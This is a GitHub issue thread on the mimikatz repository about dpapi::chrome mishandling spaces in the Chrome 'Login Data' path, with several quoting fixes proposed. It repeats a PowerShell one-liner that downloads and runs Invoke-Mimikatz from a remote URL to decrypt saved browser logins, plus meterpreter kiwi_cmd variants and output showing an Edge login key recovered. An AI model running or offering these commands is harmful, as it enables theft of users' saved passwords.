search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.3k stars 3.7k forks source link

Dpapi::chrome - problem with handling spaces in the file path #370

Open ForDockerImage opened 3 years ago

ForDockerImage commented 3 years ago

Hi, why mimikatz/kiwi cannot process first space when opening chrome database "Login Data" ?

.ps1 version:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""

Errror:

Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappda ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz

Metasploit(kiwi):

When i try to use mimikatz / kiwi from meterpreter session: kiwi_cmd "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""

I get an error of mimikatz cannot find the database file "Login Data", because it processes the file path up to the first space.

`ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:"%localappdata%\Google\Chrome\User Data\Default\Login Data")

mimikatz(powershell) # %localappdata%\Google\Chrome\User
ERROR mimikatz_doLocal ; "C:\Users\Tester\AppData\Local\Google\Chrome\User" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(powershell) # Data\Default\Login
ERROR mimikatz_doLocal ; "Data\Default\Login" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(powershell) # Data
ERROR mimikatz_doLocal ; "Data" command of "standard" module not found !

          Module :        standard
          Full name :     Standard module
          Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname
ForDockerImage commented 3 years ago

I'm not good at C/C++ but i looked at your code and I guess that problem in WideCharToMultiByte():

char * kull_m_string_unicode_to_ansi(const wchar_t * unicode)
{
    int needed;
    char * buffer = NULL;
    if(needed = WideCharToMultiByte(CP_ACP, WC_COMPOSITECHECK, unicode, -1, NULL, 0, NULL, NULL))
        if(buffer = (char *) LocalAlloc(LPTR, needed))
            if(needed != WideCharToMultiByte(CP_ACP, WC_COMPOSITECHECK, unicode, -1, buffer, needed, NULL, NULL))
                buffer = (char *) LocalFree(buffer);
    return buffer;
}
Papotito123 commented 3 years ago

Hello: At first trying to like you I also thought fhat is sn error. The error is because the blank space is recognized as a separator. I can't remember where I saw the solution but is using more \ ,maybe some \. snd some more ( " ). The think is the sentence to recognize a blank space as a blank space and not as a separator

.

ForDockerImage commented 3 years ago

Hello: At first trying to like you I also thought fhat is sn error. The error is because the blank space is recognized as a separator. I can't remember where I saw the solution but is using more \ ,maybe some . snd some more ( " ). The think is the sentence to recognize a blank space as a blank space and not as a separator

Thanks for the answer, i tried different options and nothing works for me , so I decided to ask the author)

gentilkiwi commented 3 years ago

dpapi::chrome support space in file path (like other commands)


  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 12 2021 23:59:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # dpapi::chrome /in:"%localappdata%\Microsoft\Edge\User Data\Default\Login Data" /unprotect
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
> AES Key is: {...}
...

You know I'm neither the author of Invoke-Mimikatz neither kiwi module of Meterpreter ?

Papotito123 commented 3 years ago

Hello: Could this be of help?

https://paulcunningham.dev/powershell-invoke-expressions-spaces-in-path/

or this ,

https://stackoverflow.com/questions/18537098/spaces-cause-split-in-path-with-powershell

You have try some because the file path is inside a command and adding single or dobles quotes can also break the sintaxis.

Beercow commented 3 years ago

Try changing your command to ‘papi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\"’

ForDockerImage commented 3 years ago

ello: Could this be of help?

https://paulcunningham.dev/powershell-invoke-expressions-spaces-in-path/

or this ,

https://stackoverflow.com/questions/18537098/spaces-cause-split-in-path-with-powershell

You have try some because the file path is inside a command and adding single or dobles quotes can also break the sintaxis.

does not work)

Try changing your command to ‘papi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"’

How did i try: IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command ‘dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data"‘

Got: Virtual-Box-Win-10-test-07-09-2021-13-31-03

file "Login Data" exists:

Papotito123 commented 3 years ago

try this: " '%localappdata%\Google\Chrome\User Data\Default\Login Data' "‘

I tried to use this IEX but I quitted due to to lack of find the right syntax. But csn be do.

Is a syntax issue. And real pain...

ForDockerImage commented 3 years ago

try this: " '%localappdata%\Google\Chrome\User Data\Default\Login Data' "‘

I tried to use this IEX but I quitted due to to lack of find the right syntax. But csn be do.

Is a syntax issue. And real pain...

Tried: IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command ‘dpapi::chrome /in:"'%localappdata%\Google\Chrome\User Data\Default\Login Data'"‘

Received: Virtual-Box-Win-10-test-08-09-2021-12-33-00

Error:

Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command ‘dpapi::chrome /in:"'%localappda ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz
Papotito123 commented 3 years ago

Hello: The error is because the minikatz commsnd is breaking in the blank space.

You have to play with the ( ' ) and the \.

Believe me,I saw a syntax to deal with this but I can't remember where I saw it.

"%localappdata%\Google\Chrome\User' Data\Default\Login' Data"

"""C:\Path\To\File"""

githubkuyaya commented 2 years ago

This is not a problem with mimikatz but with Invoke-Mimikatz. I've researched on this, but haven't found a way to fix this. It has also been mentioned here and here.

timwr commented 2 years ago

Please see my fix for kiwi_cmd within meterpreter here: https://github.com/rapid7/mimikatz/pull/7 I believe the underlying issue is that the arguments for commands are treated as commands. I've put together the same fix here: https://github.com/gentilkiwi/mimikatz/compare/master...timwr:fix_370 If you think it's useful I will create a pull request here.